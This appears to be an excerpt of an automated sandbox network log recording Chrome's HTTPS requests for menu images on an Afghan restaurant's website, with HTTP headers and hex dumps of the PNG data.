                                                                                                                                                    2024-10-01 04:26:53 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:53 UTC194INData Raw: aa b9 c3 aa d8 4a a9 b6 da 41 37 4c 92 d0 bd d0 58 9c bf e0 bb 2d 8c 74 0e a7 5e 27 08 7d 32 c5 0e 2c d3 46 09 85 d4 24 91 e3 a2 74 03 0d 81 5a d9 87 32 db d1 4b 79 f6 6c 46 20 b4 ae 91 9d ad d0 69 a6 80 94 10 c2 10 9a d0 ad 6c de d0 0d c3 14 0a d3 a9 cd 77 06 ad ca 70 f7 c8 ae ab 68 d2 24 8e 2c c3 d0 34 84 94 b1 e7 99 42 48 89 26 94 90 9a 94 d2 90 52 b6 6b b0 8b 38 d1 4c c3 08 8d 54 ba 96 24 f1 6c 10 59 67 0c 4d 27 6d c9 97 67 88 a9 7f b8 06 d2 aa 4b f6 0f dd 68 f8 7e 3c e4 0f 5e c1 0f 40 fd c1 f1 0a 38 fe 9f 01 00 02 5e 48 d7 41 38 00 2d 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                    Data Ascii: JA7LX-t^'}2,F$tZ2KylF ilwph$,4BH&Rk8LT$lYgM'mgKh~<^@8^HA8-IENDB`


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    102192.168.2.449868162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:52 UTC396OUTGET /assets/imgs/menu_imges/Chicken_Karae.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:53 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:52 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 19:30:00 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 39813
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:52 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:53 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 71 00 00 00 4b 08 06 00 00 00 47 9f 68 1b 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRqKGhpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:53 UTC5499INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:53 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:53 UTC1898INData Raw: 16 69 c6 53 36 29 5d 94 1c 37 d1 4a 48 e4 ee be d3 55 6a 57 cb e7 a2 76 c1 73 5d 17 25 1d a4 23 11 52 8d 53 6f ae 31 36 c3 ee 92 7c ed 6e 85 39 36 f6 11 28 e5 e0 7a 0e 9e eb 10 f8 1e 85 d0 a1 e0 c9 6f db 8a 58 60 67 a7 cb 5a 7b 6b b3 dd ed de b8 73 e5 fa 9d 5a 73 e2 4a 1c 67 97 be f1 cf 3f 76 21 6c 2c dc fa c0 cf fd 87 3a 2c f8 bf 53 75 fd 1b 3e 4e b5 3a f1 af 7c b2 5c ae a7 bd d6 f6 17 5c d2 13 7e e8 a1 a8 30 48 b6 49 e3 21 81 c9 08 c2 0a 8e 72 c8 bc 1c ed 65 e8 cc 47 fb 21 69 32 22 cf 33 72 e5 90 8d ba 63 c5 d4 ae d5 b0 e7 29 84 5b 26 cf ed d8 e6 ab b5 83 e7 05 08 a1 be ad c1 fb 1d df 7a 89 91 e3 94 26 ad 18 df bd 52 8e 8b 11 c7 1d df dd ae 83 72 c7 72 72 b5 2b 52 31 c6 8e 23 3b dd 4d 95 bb 3e e2 52 8d 23 52 29 0f e1 09 94 52 f8 9e 4f b1 e8 51 0e 1c 02
                                                                                                                                                    Data Ascii: iS6)]7JHUjWvs]%#RSo16|n96(zoX`gZ{ksZsJg?v!l,:,Su>N:|\\~0HI!reG!i2"3rc)[&z&Rrrr+R1#;M>R#R)ROQ


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    103192.168.2.449869162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:52 UTC400OUTGET /assets/imgs/menu_imges/Rice_with_Spinach.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:53 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:52 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 20:43:02 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 46099
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:52 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:53 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 96 00 00 00 4b 08 06 00 00 00 92 a1 7e 13 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRK~pHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:53 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:53 UTC13683INData Raw: f7 61 94 2d 9e 7f 25 cf c1 03 fb 08 4a 16 2f 9e bc c8 82 51 67 64 e1 0a d5 5a 9d a1 81 11 b2 23 19 4e 34 4b b4 0a 75 f6 0c 27 58 2e 34 b9 7e e5 0c f7 1c de ce d4 cc 1a cf 5f 9c a3 e9 9f 42 bc f7 fe f6 f1 54 87 d7 e0 66 c9 94 ed 58 1b 03 60 18 c6 46 2c 4b ee 54 14 39 8e 87 2e 24 14 a7 8e e2 db 48 e1 30 86 b1 c4 fc aa c9 5d a3 39 1e ee 36 58 af 43 61 79 81 98 54 23 2b 19 68 7e 09 a3 69 b0 3a 5f 47 d7 7d 82 09 9d 17 6f 54 99 e8 0e 32 58 ed e2 ea 5c 0d cd 37 18 da 1a 20 3a 31 c2 d7 4e 17 a9 c8 06 9b 07 d2 ec ee 6a 72 f8 d0 04 ad 96 8e 9c 8d 93 5f 2b 21 a4 ab 4c 55 4a d8 89 07 d9 3c 1a 63 7d b9 c9 e3 cf be c2 dd 87 47 71 4f 3e 8d 22 97 08 8c bf 05 b5 bc c6 7a c1 e3 92 19 e3 d8 81 8f d1 0a 3c c9 fc ea 1e 3c 25 8b 66 fc 3f 44 f6 ec 27 22 37 19 9d a8 f2 37 4f 68
                                                                                                                                                    Data Ascii: a-%J/QgdZ#N4Ku'X.4~_BTfX`F,KT9.$H0]96XCayT#+h~i:_G}oT2X\7 :1Njr_+!LUJ<c}GqO>"z<<%f?D'"77Oh


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    104192.168.2.449871162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:52 UTC400OUTGET /assets/imgs/menu_imges/Vegetarian_Ashaak.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:53 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:52 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 20:22:30 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 39243
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:52 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:53 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 69 00 00 00 4b 08 06 00 00 00 73 e6 a9 07 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRiKspHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:53 UTC5499INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:53 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:53 UTC1328INData Raw: 8e 24 80 aa b6 a2 86 b3 e8 a6 b9 34 57 54 3c 14 32 49 5c aa 82 5e d0 c8 cd 0e a3 b8 fd 48 92 82 a6 15 51 1d 5e 9c 2e 2f 92 ac 5e f0 4f b2 10 b0 71 7a 02 54 36 b4 e1 f2 06 18 ef 3b cd e2 e4 00 4d dd db 58 be bc 8d 67 9e 38 f0 d7 53 e3 e3 99 8a 68 15 5a b1 70 21 8a 2c 1c 2e 27 a2 20 fc ee 83 f4 4f c1 12 25 09 6f a8 0c 51 96 99 1b 3c f3 b3 b9 fe 9e 9f 8d 76 ac 7a 4b cb 9a 6d 7f 5b db da 15 0e f8 43 14 52 09 8a f9 1c b9 6c 16 45 59 02 cb e5 72 61 3a 9c 28 0e 17 6a 31 8f 20 29 94 0c 9d 52 36 81 ae 25 b0 6d 63 e9 41 bb 64 44 40 96 45 ac 52 01 43 2b a2 f8 2b 50 fd 65 38 bd 41 9c 6e 1f b2 c3 85 a2 3a 90 15 e7 85 e4 bf f4 27 89 22 1e b7 87 c4 dc 34 23 67 5e c2 17 ae 60 e3 65 57 33 bb 90 3d 75 74 ff e1 af 87 23 61 b0 ec 57 0d a9 5f 35 9f f9 4f 9a b1 fe 0f 7c 49 83
                                                                                                                                                    Data Ascii: $4WT<2I\^HQ^./^OqzT6;MXg8ShZp!,.' O%oQ<vzKm[CRlEYra:(j1 )R6%mcAdD@ERC++Pe8An:'"4#g^`eW3=ut#aW_5O|I


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    105192.168.2.449873162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:52 UTC396OUTGET /assets/imgs/menu_imges/Potato_Borani.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:53 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:53 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 22:16:34 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 37903
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:53 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:53 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 57 00 00 00 4b 08 06 00 00 00 05 dc 1b 8c 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRWKpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:53 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:53 UTC5487INData Raw: 34 2b ef b8 97 77 6f ba 92 6d 6b de 64 e1 15 d7 70 fe 0d d7 d0 ba 77 17 1b be 7f 13 05 d5 d5 cc b8 e1 7a fa 8e 1d 22 da dc 4f 7f f7 20 ed 1f be c9 cc 3b ef c5 d2 12 94 ce 9d 86 53 74 b0 e3 d7 3f a0 a3 f1 28 13 57 9e 49 45 ed 14 1c 92 44 32 31 80 ae 67 73 c2 42 d3 44 96 64 3c e1 32 0c c3 22 33 dc 43 b0 b0 38 10 89 a6 1f 56 35 3d b5 60 d6 84 2f 07 77 f7 07 6f cf 9e bc e8 ac 0b 34 cb c6 50 7f 17 8a d3 83 3b 10 c0 34 75 74 51 26 af a4 0a 55 b5 e8 38 ba 03 45 8b 52 12 10 29 2e 08 72 f6 f5 57 51 58 e8 e7 c1 ef fd 96 89 33 26 71 d9 83 bf e1 cd 7b 1f 60 db 86 5d cc 5c 3a 87 25 37 dc 8a 72 fc 10 a9 13 fb 39 9a 30 49 c4 a2 d8 ed b0 bb a1 9b 39 cb 17 a2 c5 55 6e fa f5 6f 38 08 38 6c 76 22 c7 8e f2 e9 6b 6b 38 eb 9a 6f 70 c3 ef ee a4 64 62 90 92 a9 13 28 1b 95 4f de
                                                                                                                                                    Data Ascii: 4+womkdpwz"O ;St?(WIED21gsBDd<2"3C8V5=`/wo4P;4utQ&U8ER).rWQX3&q{`]\:%7r90I9Uno88lv"kk8opdb(O


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    106192.168.2.449872162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:52 UTC396OUTGET /assets/imgs/menu_imges/Borani_Banjan.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:53 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:53 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:10:48 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 39437
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:53 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
